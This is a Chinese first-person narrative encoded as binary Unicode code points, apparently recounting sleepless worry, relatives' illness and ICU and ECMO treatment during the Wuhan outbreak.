100111000000000 110011001011010 100111000001010 110001000010001 1001000011111101 110110010100001 110011100001001 111011101100001 111011101000000 1111111100001100 101111110001000 110001011000101 101111111100111 1111111100001100 111111111111011 110011101100101 1000100110000110 101001110111011 101011100110000 110000011110011 1111111100001100 100111101000110 101001111001000 1000100111001001 101111110010111 101000111100001 100111010001011 110000000111011 110011100001001 100111000100100 1001011101100010 110000000100111 1111111100001100 101001101110011 100111110111111 1001000000100000 110001000010000 100111000001101 1000001001101111 101111101110001 101010011001101 1111111100001100 100111101000110 110001111010000 1001000110010010 110101101100110 110110001001001 111011010000100 101001100111011 101001010100001 100111010111010 101010001011000 110110011101000 110000100001111 1001011000110010 1000001100000011 100111001011111 100111000001101 100111000000000 101101110011010 110011000101111 100111000101010 101011101001111 100111010001011 11000000000010 111101100101100 100111010001100 101100100101001 110010111101001 100111000001010 111000 111000010111001 101100100011010 100111000000000 111000010111001 1111111100001100 1000111111011000 110110010100001 110011100001001 111101101001001 110001000010001 100111010100100 101101110001100 111001111101101 1111111100001100 101000010101100 110001000010001 1000111111000111 101001110111011 111011010000100 111010100110101 1000101111011101 101110000110001 110001001010011 110011101100101 100111010000110 11000000000010 1010 1010 100111001001011 101010000001110 111011010000100 111111010100110 1000110000001000 1111111100001100 110001000010001 1001000001101101 101001111010111 100111010000110 101001001001101 110001001000000 110011100101010 110011100001001 111011010000100 11000000000001 1001011101011110 101111000111000 100111000100101 101001110001001 111011010000100 110010110100101 1000110100100011 11000000000010 1010 1010 101111101010011 110010111110110 1111111100001100 1000110000001000 1000101111011101 111011010000100 1001100010000110 101101111111100 1000101111110100 1111111100001100 11000000001100 110001000010001 100111011101100 101000111111010 101001110111011 101111100000000 100111100011010 1001000011111101 110001010101100 100111000001101 1000110101110111 101100100110100 1111111100001100 110011111010000 110011111010000 110011111010000 100111000111011 100111011111011 110001001111001 1000101111000100 110001000010001 100111011101100 101001100111011 1001011001100010 1001000010100011 100111000101010 1000001001111110 1000001010101100 1111111100001100 100111101011100 100111000111010 110101101100110 110110001001001 101111000000010 100111000101101 101111111000011 101001100111011 1001011001100010 110000000100101 1000101111001010 111100111010001 100111000111011 100111011111011 1111111100001100 100111101100000 110011000101111 100111000010011 100111000011010 100111010111010 101100011101011 1111111100001100 110000000001110 100111001001000 1000000011111101 101100100011111 110110010100001 110011100001001 101001110011111 101001000011001 110110010100001 110011100001001 111111011000100 111111011000111 111111010101010 101111110001011 1001000000100000 1000110000100011 111010100011111 100111010001011 1111111100011111 11000000001101 1000111111011001 110011000101111 101001110011111 1000101111011101 11000000000010 1000101110101001 110001000010001 101011011011110 101001110111011 1000110111011111 111100111010001 101101110100100 111011010000100 110010 110000 110000 101100100011010 101001111110111 100111010111010 100111000000000 100111000101010 100111000101010 101011100110000 101001111100011 101100100110100 100111100100000 1000111110111110 101001000110000 100111101001101 1111111100001100 100111000001101 1000000011111101 101001111010001 101111110101110 100111111100001 11000000000001 111011111101101 100111111100001 100111100100000 1000111110111110 1111111100001100 101001111101010 1000000011111101 101111101010011 1001011101100010 1000000001001010 110001000010110 1000000000000101 110001001010011 111010100110101 1000101111011101 1111111100001100 100111000001101 1000101110111000 1000101111110100 101000101110011 100111010001110 1000111111011001 100111000101010 1000000010111010 111000010001110 111011010000100 100111011111011 100111101010101 100111010001011 110000011000101 1111111100001100 11000000001100 1000111111011110 1000000111101010 101110111110001 111011010000100 1000000000000001 101000101101100 1001000011111101 100111000001101 1000000011111101 1000101111110100 11000000001101 10000000100110 10000000100110 1010 1010 110001000010001 110010101110100 100111000101010 100111010111010 100111000000000 100111000001011 101101101010000 101110000110001 110000111110101 100111010000110 1111111100001100 100111011010110 100111000001101 110011000101111 110001001111001 1000101111000100 100111101100000 1000111111011001 100111000101010 100111010111010 101110111100101 100111101011100 100111000001101 101001010101010 101001010011011 1111111100001100 1000000000001100 110011000101111 101100101111101 101000011001111 110010101110100 100111000101010 110101101100110 110110001001001 101111000000010 101001111010001 101110001010101 111011010000100 101100100100111 101100101111101 101110001000000 1001011101100010 1000100010101011 110001000010001 100111000000000 100111000101010 100111010111010 111100000110100 101011101001111 100111010000110 11000000000010 110001000010001 101111101010011 110010111110110 110011100001001 100111000000000 111100111001101 101111110001000 111111011011101 110011100011011 111011010000100 110000100011111 1000100111001001 1111111100001100 110001000010001 110011000101111 100111000000000 100111000101010 101111001110011 110010111110110 1000101110100100 1000101110100100 111011100011111 111011100011111 11000000000001 101001011100100 101001011100100 110000001110011 110000001110011 101110111100101 100111101011100 111011010000100 100111010111010 1111111100001100 110001000010001 1000100111001001 101111110010111 1000000111101010 101110111110001 101000001011010 111011010000100 100111010001011 110000011000101 1001000011111101 110011000101111 110001100001001 1000100111000100 111011111101001 110011101100101 111011010000100 1111111100001100 1001000011111101 110011000101111 110011100001001 1001000001010011 111010000000110 111011010000100 1111111100001100 110001000010001 111001010101111 100111010000110 100111011000000 100111001001000 1001010100011001 1111111100011111 110001000010001 111011100001011 101001000110000 100111010000110 1000111111011001 100111000101010 110001010100101 101010001001010 1111111100001100 110001000010001 100111001011111 100111000001010 110001010100101 101001100111011 1001011001100010 100111010000110 1111111100001100 110001000010001 101010010001100 110001000010001 111011010000100 101010000001100 101101101100110 1111111100001100 101010000001100 1000100001001100 100111001001011 1001010111110100 101101111111001 100111010001110 110011111010000 100111000000000 100111000101010 111010111000101 100111010111010 111011010000100 110000011000101 101000110110101 1000111111011011 1000100001001100 100111010100100 110110101000001 1111111100001100 110110010100001 110011100001001 1001000000001111 1001011100110010 111010111000101 100111010111010 111011010000100 100111011111011 100111101010101 111100111000001 100111010111010 100111111100001 110000001101111 1111111100001100 101110000110001 111011011111000 101111101010011 100111010001110 110011000101111 101001100111011 101101101100110 111010100011111 100111001001011 1001010111110100 1000101110101000 1000101110111010 100111000000000 100111000101010 111010111000101 110100001001000 1111111100001100 101111101010011 100111101100000 100111101011100 100111000111010 100111000000000 100111000101010 100111000110100 101111010001010 111011010000100 101001100111011 111010100011111 1111111100001100 101110111110010 111111011001111 111011111100101 1001000001010011 101011100101000 111010111000101 100111010111010 1000111010101011 100111000001010 101001111010001 111001110110000 100111010000110 100111000000000 111100111001101 101111110001000 1001000111001101 1000100110000001 111011010000100 111010111000101 110101111010010 1111111100001100 101001000101011 111011010000100 101001100111011 111010100011111 1001010111101110 1000110101110111 1111111100001100 100111101100000 110000000001110 100111001001000 101001111101111 1000000011111101 100111000001101 1000101111110100 101010001100010 1111111100011111 1000111111011001 110011000101111 100111101100000 101111101010011 101001100111011 111010100011111 111011010000100 110011100101100 1000000011111101 1111111100001100 101101111111001 100111000001101 101101111111001 1111111100011111 110001000010001 101000001011010 1001010100011001 100111011000000 100111001001000 100111010000110 1111111100011111 110001000010001 101000001011010 100111010000110 100111000000000 100111000101010 101001100111011 111010100011111 11000000000001 100111000000000 100111000101010 100111010111010 110101101100011 101111000111000 101111010010100 1000101111100101 101000001011010 111011010000100 100111010001011 110000011000101 1111111100001100 110001101100010 100111101011100 110011000101111 100111011111011 100111101010101 100111010111010 110001000010001 1000100111001001 101111110010111 1001000011111101 100111100011010 1000111111011001 100111001001000 101000001011010 11000000000010 1010 1010 110001000010001 101111101010011 110010111110110 111011010000100 110000011000101 111111011101010 100111001011111 101111110001000 110111111000000 101001010101000 1111111100001100 1000101111110100 1111111100001100 1000111111011001 100111000101010 100111010001011 110011000101111 110001000010001 101000001011010 111011010000100 1111111100001100 1000110111011111 101000101110110 100111101011001 100111010111010 1001000011111101 110110010100001 110011100001001 101000101110011 111110011111011 1111111100001100 100111101100000 100111011101100 101111001110010 1000000100000110 110001010001010 110001000010001 110001010010011 101001110111011 101011101010000 111001001100010 101010000100111 11000000000010 110001000010001 1000101111110100 110001000010001 111001110110000 101011100101000 1000111111011001 100111000101010 111001010110110 110000000000001 100111000001101 1001000000000010 101010000001000 101011100101000 1000111111011001 100111000101010 101110010010111 100111101001101 100111000001010 111111011100111 111111011101101 101110111100101 100111101011100 100111010000110 1111111100001100 110000011110011 1000100110000001 100111100010001 110000001101111 100111000000000 110101110110101 110010111110110 1001010111110100 11000000000010 1001100010000110 101101111111100 110110010100001 110011100001001 101010000001100 110000100001111 1111111100001100 1000101111110100 1000111111011001 100111000101010 110010111110110 101000000011001 110101101100011 110011000101111 1000000000000011 1001101010001100 110001000010001 111011010000100 110010111110110 101000000011001 11000000000010 1010 1010 101111101010011 101100100101001 110011001011010 100111000001010 101011011011110 101101110110110 1111111100001100 110001000010001 1000101110110000 101111110010111 1000011011101110 110111000000101 110100101011010 1111111100001100 1000111111011011 1001010111101000 101010000001110 101110000110001 1000110111011111 110001000010001 1000000000000001 101000101101100 1000101110110010 1111111100001100 110001000010001 1000100110000001 110011000101111 101000111111010 100111010000110 100111011000000 100111001001000 100111010001011 110000011000101 1111111100001100 100111101100000 101110000110001 101100101111101 101100101111101 101011100110000 110001010001010 101101101101001 101101101010000 101111000100110 101100100100111 11000000000010 101011011100000 100111000111010 110001000010001 111011010000100 100111010001100 101101110011101 1000111111011000 101111110001000 101110000001111 1111111100001100 110001001001101 110001 101110010000001 101100100011010 11000000000010 100111011010110 101111101010011 110010111110110 1000100111001001 101111110010111 1000001110101011 101010000001101 101000101110110 101100110011001 1111111100001100 110001000010001 110110010100001 110011100001001 1000110111011111 100111011010110 1000101111110100 1000000111101010 101110111110001 1000100010101011 1000101110101101 1000101111011101 111011010000100 100111010001011 1111111100001100 110001 110011100001000 110010 110000 101001111110111 1111111100001100 1001010010011111 101001101010111 101110001110001 1000101111110100 100111010000110 100111010111010 100111100100000 100111010111010 100111001001011 101010000001110 1111111100001100 110001000010001 110001001001101 1000110111011111 100111011010110 1000101111110100 1001000010100011 101100100101001 101001111010001 111010100011111 100111010000110 100111011000000 100111001001000 11000000000010 1001000010100011 110011100011111 1001010111110100 1111111100001100 110001000010001 101001111101010 110011000101111 110001111010000 1001000110010010 101101110110110 100111010111010 100111000001101 1000100110000001 101001110111011 100111010111010 101100100011010 111011010000100 101011100110000 110010110111001 1111111100001100 101000111111010 1001010111101000 1000100110000001 110001000110100 101001111100011 111111101101001 11000000000010 1010 1010 101100100010110 101011011110100 111100111010001 101101110100100 1010 1010 101111110001000 101100100011010 100111010111010 110001011000101 101111111000011 110001000010001 100111001011111 110011000101111 1001000010100011 111000 100111000101010 100111010111010 100111001001011 100111000000000 1000100010101011 101001111101011 101001110111011 1000101110101101 1000101111101011 11000000000010 101101110011110 1001011001000101 100111000001010 110001000010001 110110010100001 110011100001001 1000100010101011 101000101101100 101101110001001 101110001000000 1000101110101101 1000101111101011 1111111100001100 101010000001110 110011101100101 110011100001001 101100101111101 110011100001011 101001111001011 1001010111101110 110001000010001 1111111100001100 100111101100000 110011000101111 100111000001101 110011000101111 101010000111001 101010011101000 100111010111010 1111111100011111 110001000010001 1000101111110100 110001000010001 100111000001101 110011000101111 101010000111001 101010011101000 100111010111010 1111111100001100 110001000010001 110011000101111 1001000010100011 100111000101010 101001111010001 101010011101000 101101101010000 111011010000100 100111010111010 11000000000010 1010 1010 100111101000110 1001000010100011 110101100100001 111111010100110 1000110000001000 101101111111001 110001000010001 111011010000100 110001001010011 101000111111011 101111110001000 101100100100111 1111111100001100 1001011101011110 101111000111000 101100100100111 11000000000010 101011011011110 110011101100101 101010000001110 110001000010001 110000100011111 1000100111001001 110010101110100 100111000101010 100111010111010 101111111000011 1001000011111101 101011110101110 100111010000110 1111111100001100 111011100011111 111011010000100 110011000101111 101111100111010 110001001010011 111011101000000 111110010111110 111100101011110 1111111100001100 1000101110100100 111011100011111 101000001011010 100111010001011 1111111100001100 101010000001110 110011101100101 110001001000000 110011100001001 111011010000100 100111010111010 101000110001101 110011101100101 1001010111101110 110001000010001 1111111100001100 110001000010001 101110000110001 100111000001101 1000000011111101 101011011011110 111101101010100 100111010000110 11000000000010 1010 1010 110001000010001 1000000011111101 101000001011010 111011010000100 101110000110001 110011000101111 101000101001000 1000101110101001 110000000100101 1000101111001010 111100111010001 1001000111001101 1000100111000110 1001011000110010 110001010100100 11000000000010 110001000010001 100111011101100 110000000100101 1000101111001010 111100111010001 110010 110000 110000 101100100011010 100111010111010 1111111100001100 100111011001110 110001 110011100001000 110001 101001111110111 101111100000000 101100111001011 1111111100001100 110001000010001 101110000110001 101001111101011 101100100100111 101101110110110 101001010100000 101111100111010 1001011000110010 110001010100100 1111111100001100 110001001000000 110011100001001 111011010000100 100111010111010 101111111000101 1001100001111011 110001000110100 101001111100011 111111101101001 11000000000001 110001000110100 101111000111101 101101101010000 11000000000001 111010100101000 110001001001011 101111111101011 110110110001000 11000000000010 1000101110110000 101111110010111 110011100001001 100111000000000 101100100101001 100111010100100 111001111101101 110011100001001 100111000101010 111010100110111 110001010100100 101100011101011 110110010100001 110001000110100 101001111100011 111111101101001 1111111100001100 110001000010001 1001101001101100 100111000001010 101110000110001 101111101010011 101011100111010 1001101010000010 100111011010110 11000000001100 100111011100101 101010000001110 100111000001101 110001000110100 101001111100011 111111101101001 101110000110001 100111000001101 1000100110000001 110011101100101 100111000001010 111001111101101 100111010000110 11000000001101 11000000000010 1010 1010 110001 110011100001000 111001 101001111110111 1111111100001100 110001000010001 100111000001011 111001111101101 110010111110110 111011100001011 1000100111000001 1001100010000100 110100011000000 101001111110000 100111000000000 100111000101010 111010111000101 100111010111010 101101111111001 111011101000000 101100100100111 101101110110110 101010010110011 1111111100001100 100111011001110 1001000010100011 101100100101001 101010000001110 1111111100001100 110001000010001 101110000110001 1000100110000001 110110001000010 100111011010110 100111011101100 101111111000101 1001100001111011 111111011011001 110011101100101 111011100001011 111010111000101 111011010000100 111010111000101 100111010111010 101001111010001 101001111100011 111111101101001 1111111100001100 100111000000000 100111010111010 101001111010001 100111000000000 100111000101010 1111111100001100 1000111111011001 100111000101010 110010111110110 101000000011001 100111000001101 1000100110000001 1000001010000010 111111010100110 1001010010110001 1111111100001100 101111101010011 110010111110110 101100100010110 1001011101100010 101011100101000 1000101111110100 110110010100001 110011100001001 100111010111010 100111100100000 100111010111010 1111111100001100 110001000010001 101001111001000 1000100110000001 101011100101000 1000111111011001 1001000111001100 101111100111010 1000110000000011 110001000110100 101001111100011 111111101101001 101001010100000 101111100111010 1001011000110010 110001010100100 1111111100001100 1001000011111101 110011000101111 101111110001000 111011111011011 111011011111110 111011010000100 11000000000010 1010 1010 1001000010100011 110101110110101 110010111110110 1001010111110100 111100001101110 101101110011110 101111110001000 101001110001011 110001010010001 1111111100001100 1001011101011110 101111000111000 111010111011011 1000001011100110 11000000000010 110011100001001 101001100111011 111010100011111 110001111010000 101000111111010 110011101100101 1000100110000001 110001010001010 1001011010010100 111100110111011 1000100001100011 111101001111111 101100100010110 101100100110100 1111111100001100 101001100111011 1001011001100010 1001000111001100 101111100000000 100111100011010 1000101111110100 100111000001101 1000101110101001 1111111100001100 1000101111110100 1001011010010100 111100110111011 1000100001100011 111101001111111 101100100010110 101100100110100 100111100011010 1001000000100000 110001000010000 110000001010000 110000101001100 11000000000010 110001000010001 101110000110001 1000101110101001 111100111010001 101101110100100 111011010000100 100111010111010 110001010001010 1001011010010100 111100110111011 110011100001101 111101001111111 111011001111101 101100100100111 1000100100000010 1001000111001100 1001011101100010 1111111100001100 1000111111011001 110011000101111 100111000001101 111101100100110 101010000001000 1000100111000100 1000001100000011 111011010000100 1111111100001100 101111110001000 1000001101010010 1000110000101100 111011010000100 11000000000010 1010 1010 110001000010001 100111011101100 111011100111100 111011101000001 111011101000001 101011100110000 111011100001011 111011101000000 111010111000101 100111010111010 1000110110001010 110011101100101 1000110110001010 101100100011010 1111111100001100 100111100100000 110010010101101 101001100111010 101011111011111 111011010000100 101001101001010 101111110000100 1000110110001010 110011101100101 1000110110001010 101100100100111 1111111100001100 101000101001000 110011000101111 101001101001110 101001101010111 110110101110111 1001110010011100 101111000000010 101011100111010 1001011001000100 1000111111010001 101001111101111 1000000011111101 1000110111011111 101101110000011 110011100001001 101000101110011 111110011111011 1111111100001100 111000100110110 101010000001110 101110000110001 100111100100000 100111100100000 100111100100000 1111111100001100 101001101001010 101111110000100 1000110110001010 110011101100101 1000110110001010 101100100100111 11000000000010 101111110001000 101100100011010 110011000101111 101101110110110 101111010101101 100111100100000 110011111010011 111011010000100 1111111100001100 110011100000000 101000101001000 111011010000100 110111 100111000101010 100111010111010 101111101010011 100111000101101 101110000110001 110011100001001 101100110001000 101100110001000 111111011011001 101000100111111 101101101010000 1001000000000001 1001100101101101 101111110010111 111011010000100 111010111000101 11000000000010 110011100001001 1000101111001010 110001001000000 111011010000100 1000000000000001 110011101111111 101111110010111 111010111000101 1111111100001100 100111001011111 110011000101111 110011101100101 110001001010011 1001010010001000 111011010000100 111010111000101 100111010111010 100111100100000 111111011011001 100111011010110 111011010000100 1111111100001100 1001000011111101 110011000101111 1001000111001101 101111110010111 100111000001101 101111110010111 100111010000110 11000000000010 110001000010001 101110000110001 111011111100101 1001000001010011 1000000010101111 101101110011010 110011100001001 100111010111010 100111100100000 100111010111010 11000000000010 101100110000010 110011110011100 110110010100001 110011100001001 100111010111010 100111100100000 100111010111010 1111111100001100 101001101001110 101001101010111 110110101110111 1001110010011100 101111000000010 101011100111010 110001 110011100001000 110001 110010111100101 101110000110001 101000101110011 1001010111101101 100111010000110 1111111100001100 110000000001110 100111001001000 111010111000101 100111010111010 100111100011010 1000110110001010 110011101100101 1000110110001010 101100100011010 101010001100010 1111111100011111 1010 1010 101111110001000 101100100011010 110010111110110 101000000011001 110001000010001 1001000011111101 101011100101000 110000011110011 1111111100001100 101100110000010 110011110011100 100111011010110 100111011101100 101111101010011 110010111110110 100111000001101 1001000010100011 110100000110111 1000101110101101 110010110100101 110001000010001 1111111100001100 101111111000011 101111001110011 110110000010100 101010010001100 101011100110000 1001010111101110 100111000000000 100111000001011 1000111111011001 100111011110110 100111010001011 110000011000101 111011010000100 110011101100101 1001111110011001 101001110111011 1000000100001001 1111111100001100 101000110001101 1000101111110111 101001000101011 111011010000100 101010001111100 101010000111000 111100111010001 100111000010011 101101110110110 100111000000000 1000110101110111 110110010011111 1001000000011010 100111000000000 100111000001011 1111111100001100 100111001011111 1000101110111000 101110001000000 1001011101100010 100111100011010 101100101111101 100111000000000 100111010011011 1111111100001100 110001000010001 1000000111110011 101110000010001 101001111101111 100111011100101 101011100101000 101001100111011 1001011001100010 101000110000101 1001000011101000 101100100011010 100111010100100 110110101000001 100111000000000 100111000001011 11000000000010 101100110000010 110011110011100 110011000101111 110001 110011100001000 110001 101001111110111 101100100100111 101101110110110 1001000011111101 1000111111011001 110100000110111 101111100010101 1000110101110111 1000101101100110 110000011010101 1111111100001100 101110000110001 100111000001101 100111100011010 110011100001001 1001000010100011 100111001001000 101100100011010 110000010110010 101001001100111 100111010000110 11000000000010 1010 1010 110001 110011100001000 110011 101001111110111 100111000001011 101001101001000 1111111100001100 101011100101000 101001101010111 100111010101100 1000110111101111 1001011001100010 101001100111010 1111111100001100 110110011001100 101110000111111 101100100010110 111100111010001 111011010000100 101001100111011 111010100011111 100111011101100 1000000001011010 1001011011000110 101011100101000 100111000000000 1000110101110111 101011011011110 1001100001111110 1000000000000001 100111000111011 100111011111011 111011010000100 101110111100101 100111101011100 101001110000110 111101000001011 1111111100001100 101001111000010 100111100011010 111011010000100 1000000011100001 101001101101011 101110011110000 101001100111011 111010100011111 100111011001010 101111001110100 110100 110011 101110010000001 1111111100001100 111001110110000 101011100101000 110101101100011 101011100101000 110001010100010 110010101010001 1111111100011011 110001 110011100001000 111000 101001111110111 100111000001011 101001101001000 1111111100001100 101001101010111 100111010101100 1000110111101111 1001011001100010 101001100111010 110010 110010 110100101111100 1111111100001100 110110001011111 101101101100110 101111010000110 100111000111011 100111011111011 1000111111011000 111111011000100 111111011000111 100111010000110 110101101100110 110110001001001 101111000000010 111010100110010 100111001110011 110000010100011 1000000000000101 101111010110111 101100100001101 1000000001010100 110101100100010 100111100011010 1111111100011011 110001 110011100001000 110001 110001 101001111110111 110010111101001 100111000001010 1111111100001100 111100111010001 101101110100100 1000110111011111 110001000010001 110110001000111 110001010100101 110000000100101 1000101111001010 111100111010001 110001010100010 110010101010001 101101110100100 110001010100100 101100011101011 1000000011100001 111110100101011 1000010110000111 110000100011111 110011111010011 1111111100001100 101100101111001 101111010010100 1000101111100101 110011000101111 100111000101101 101111111000011 101001100111011 1001011001100010 111101100101100 100111000000000 100111000101010 1000100010101011 110000100011111 110011111010011 111011010000100 110001010100100 101100011101011 1111111100001100 110001000010001 111101100101100 100111000000000 110010111110110 1001010111110100 111111011011001 101001100111011 101001010100001 111100111010001 111100111010001 1001010101111111 110001001010011 111010100110101 1000101111011101 110110001000111 110001010100101 1111111100001100 111000100110110 101010000001110 101001100111011 1001011001100010 111110100100111 110000000100101 101111100000000 100111010000110 100111100011010 1111111100001100 100111100011010 100111000001010 110001100000111 111100100111010 110001010001010 11000000001100 100111000100100 100111000001011 1000000010111010 110000100011111 110011111010011 1111111100001100 111010111000101 110101111010010 110000000100111 1000000010111010 111000010001110 1111111100011111 11000000001101 111011010000100 110001010100101 101010001001010 110010100111001 110001000010000 11000000001100 100111000100100 1000000010111010 110010101100011 101011100101000 110000100011111 110011111010011 11000000001101 1111111100011011 110001 110011100001000 110001 110110 101001111110111 110011100000000 101010000001110 100111000000000 110101100100001 101010001101000 100111100011010 100111000001010 1111111100001100 100111000000000 100111101001101 101001001101111 1001011001100010 1001010101111111 1000111111011000 101011100101000 1000101111110100 1111111100011010 11000000001100 101100100100111 101101110110110 1001000011111101 1000100110000001 110011100001001 100111000000000 111000010111001 101001100111011 101101101100110 101111000111000 1000101111000110 1111111100001100 110011111010000 100111010011011 1001101011011000 101111001110100 1000110101000100 111011010000100 101001100111011 111010100011111 100111000001101 1000100110000001 1000000111101010 101110111110001 110001010001010 1000000111101010 101110111110001 110010000011110 101111110010111 101010000010011 110101101111011 100111010111010 111011010000100 11000000000010 11000000001101 101001111100110 100111000000000 100111101001101 1001100010000110 101101111111100 100111000001010 101001111110000 111111011100111 111111011101101 1000101111110100 1111111100011010 11000000001100 110110010100001 110011100001001 100111010111010 100111100100000 100111010111010 1111111100001100 101001111101111 1001011000110010 101001111101111 110110010111011 101001111101111 110001110100111 11000000000010 11000000001101 100111000000000 101100100101001 101010000001110 1111111100001100 110001 110011100001000 110001 110111 101001111110111 1111111100001100 110110001011111 101101101100110 101111010000110 100111101001111 1001011001100010 1111111100001100 110001 110000 101100100101001 101010000001110 110001111010010 111101110100001 11000000000001 100111000001010 1000101 1000011 1001101 1001111 11000000000010 1010 1010 100111000101101 101111111000011 101001100111011 1001011001100010 111011010000100 100111011100011 100111011110111 1000111111011001 100111001001000 101100100100111 1111111100001100 101110000110001 110011000101111 1000110111011111 110001000010001 100111011101100 111011010000100 101001100111011 101001010100001 100111010111010 101010001011000 110110010100001 110011100001001 100111111100001 110000001101111 1001000000001111 110011000001110 101001100010110 110011100001001 101000101110011 11000000000010 100111101100000 111011100001011 101000000010010 100111000001011 111011010000100 100111010111010 1111111100001100 110000000100101 1000101111001010 111100111010001 101010010001100 101010001111100 101010000111000 111100111010001 111011010000100 101000000010010 110011000101111 110110010100001 110011100001001 1001000010100011 100111001001000 1001000111001101 111011010000100 1111111100001100 101011011100000 100111000111010 110001000010001 100111011101100 110011100001001 1001011000110010 110001010100100 110000100001111 1000101111000110 1111111100001100 101111001110110 100111000010100 100111000000000 111010100011111 111010111000101 101110000110001 1000110101110110 111110100100111 100111100010001 110000001101111 110110010111011 111010110010111 11000000000010 1001000111001101 111011010000100 1001000011111101 110011000101111 101100100010110 101011011110100 111100111010001 101101110100100 1111111100001100 110011101001110 110010110000111 100111010101110 110011000101111 111011100111100 111100111010001 111011010000100 1111111100001100 110110001011111 101101101100110 101111010000110 110011000101111 111010100110010 100111001110011 111100111010001 111011010000100 11000000000010 1010 1010 110110001011111 101101101100110 101111010000110 111011100011111 111011010000100 1001011101011110 101111000111000 101100101111101 111011010000100 100111000000000 100111000101010 100111010111010 1111111100001100 101001100111011 110011100101111 101111110001000 1001101011011000 1111111100001100 101000101101000 1001011001100010 111011010000100 100111000100100 100111000101010 100111000101101 101011011111101 101001100111011 101111000001000 101100101010110 100111001001011 100111000000000 11000000000010 1000000000001100 100111000010100 110001000010001 100111011101100 1000111111011000 110011000101111 1001000010111011 101110001000101 1111111100001100 110001000010001 100111011101100 100111000000000 100111000101010 101001101010101 101000101000011 1111111100001100 110001000010001 100111101001111 101011011011011 101001101000001 101000111100000 110100101111100 1111111100001100 100111011010110 100111101001111 100111000001001 101001101000001 101000111100000 110100101111100 1111111100001100 101000101110011 111110011111011 1001000011111101 101111110001000 101100101111101 1111111100001100 100111101000110 110011000101111 101111001110011 110010111110110 101011011100000 100111000111010 101110111100101 100111101011100 101100100101010 101111111011001 1111111100001100 101110000110001 101001111101010 1000000011111101 101111100000000 100111100011010 11000000000001 110010000011110 101001100111011 1001011001100010 110110100111011 101001010101000 110010111110110 101000000011001 1000100111000001 1000100111000001 1001011101100010 11000000000010 100111011010110 110011000101111 100111000101010 101110111100101 100111101011100 111001011000010 1111111100001100 1000100110000001 100111001001000 101110000110001 101011100101000 110001001001011 110011100101111 101101110100100 1111111100001100 1000100110000001 100111001001000 101110000110001 101011100101000 111011100001011 1001010111101000 1000101111001010 11000000000010 1000110000000001 100111001011111 100111000001101 100111100011010 111001001111001 110000100001111 1000110111010001 101001110111011 1000110111011111 100111011010110 1000101111110100 1111111100001100 110110001011111 100111000111011 100111011111011 1111111100001100 100111101100000 1000100110000001 110110011101000 110000100001111 1111111100001100 110001000110100 101001111100011 111111101101001 11000000000010 100111011010110 100111001011111 110110010100001 110011100001001 110010111110110 1001010111110100 101010010001100 111110010111110 101001010011011 110001001010011 101010000101100 1000111111011001 100111010011011 100111010001011 1111111100001100 100111011010110 1000000010101111 101101110011010 101110000110001 101100100100111 110000100001111 100111010000110 1111111100011010 11000000001100 110011100001001 100111011000000 100111001001000 101000101110011 111110011111011 1111111100011111 101110000110001 110011000101111 100111000101010 1000000010111010 111000010001110 11000000000010 11000000001101 1000111111011001 100111000101010 110011000101111 100111011010110 100111011101100 111100111010001 101101110100100 111011010000100 100111010111010 101010001001010 1000101111001001 110001000010001 111011010000100 11000000000010 1010 1010 101100110000010 110011110011100 1000111111011001 100111010011011 101001100111011 111010100011111 1001000011111101 1000000011111101 101100100011111 101111110010111 101001000110000 101001111001010 110010111110110 111011010000100 110001111010000 1001000110010010 1111111100001100 110001000010110 1000101110111000 101110000110001 100111000001101 100111100011010 110011100001001 1000111111011001 100111000000000 101100100101001 11000000000010 110001001000000 100111011100101 1111111100001100 100111101011100 100111000111010 101111101010011 100111010001011 100111010111010 111011010000100 110001000010001 1001011101011110 101111000111000 101010000001110 110000010010100 1111111100001100 110010111101001 111011111100101 1001000001010011 110011100001001 100111011001010 101100100101001 1111111100001100 110001000010001 111101110100001 100111011010110 110001001111001 1000101111000100 100111000001101 110001001111001 1000101111000100 110001000010001 1111111100001100 11000000001100 1000000000000001 101101101010000 11000000001101 101001000110000 101100100000100 1000101111110100 1111111100001100 110011000101111 100111000001101 110011000101111 1111111100011111 1010 1010 1000011001111101 111000100110110 101010010001100 110011101001110 110010110000111 100111010101110 101010000001100 101011100101000 100111000000000 100111000101010 101001100111011 1001011001100010 1111111100001100 100111000000000 111011011110100 101001000110000 101001110111011 100111000010110 100111001001011 101001001001101 110001000010001 1001000011111101 100111000001101 1000101110100100 101111110010111 100111011010110 1111111100001100 101011011100000 100111000111010 101001100111011 1001011001100010 110100 110000 110000 110000 101100100011010 101001111110111 100111010111010 101100100101010 101100100011010 100111010000110 1111111100001100 101111001110011 110010111110110 100111001011111 101111111011001 11000000000010 100111011010110 101001110111011 100111000010110 101001001001101 111011010000100 1001000010100011 101100100101001 110011001011010 100111000001010 1111111100001100 1001001 1000011 1010101 111011010000100 100111000111011 100111011111011 1000110111011111 110001000010001 110001001010011 111010100110101 1000101111011101 101000000011111 110000000100101 1000101111001010 111100111010001 111011010000100 101111111000011 1000000100001111 110001100001001 101001110001011 101011001101000 1111111100001100 1000101111110100 110011101001110 110010110000111 100111010101110 1000100110000001 110001010100010 110010101010001 1111111100001100 110001000010001 100111000000000 101010000101100 1000111111011001 100111000101010 110110110001000 110000001101111 101100100100111 101010000000011 100111000000000 110000011001010 1111111100001100 110011101001110 110010110000111 100111010101110 1000111111011001 100111000101010 100111010001011 110010101110100 100111000101010 1000111111000111 111101000001011 110001000010001 100111000001101 100111010000110 1000100111100011 1111111100001100 100111101000110 110011000101111 100111011010110 111011010000100 111010111000101 110000011000101 1000110111011111 100111011010110 101001111010111 1000101110101101 110010110100101 100111001001011 101010000001110 101111111000011 110000011000101 100111000001101 101100101111101 110011100001001 110110010100001 110011100001001 101000101110011 111110011111011 1111111100011111 1000111111011001 110001000010001 1000100110000001 110001001010011 100111000101010 1001010111101110 101001111110111 1111111100001100 101011011100000 100111000111010 101001111010111 1000101110101101 111011010000100 110000100011111 1000100111001001 110001000010001 110000100011111 101010000001100 1000111010101011 101001111010111 11000000000010 1010 1010 101010000001110 110011101100101 1111111100001100 100111010001011 110000011000101 101001111010001 101110001010101 101001000110000 1000111111011001 100111000000000 110101101100101 1111111100001100 1000101111000001 110011000001110 110011101001110 110010110000111 100111010101110 110011000101111 101101111111001 111011010000100 110010111110110 101000000011001 1111111100001100 100111011010110 111011010000100 101111111000011 110000011000101 110001000010001 1001011101011110 101111000111000 1000000011111101 111010000000110 1000100111100011 1111111100001100 101001111101111 1000000011111101 1000110111011111 110001000010001 111011010000100 101111111000011 110000011000101 100111000000000 110100000110111 1111111100001100 100111000001101 110011000101111 110111111000000 101001010101000 11000000000001 1001101011011000 101000101110100 1111111100001100 1000000000001100 110011000101111 101010000001110 110000010010100 1111111100001100 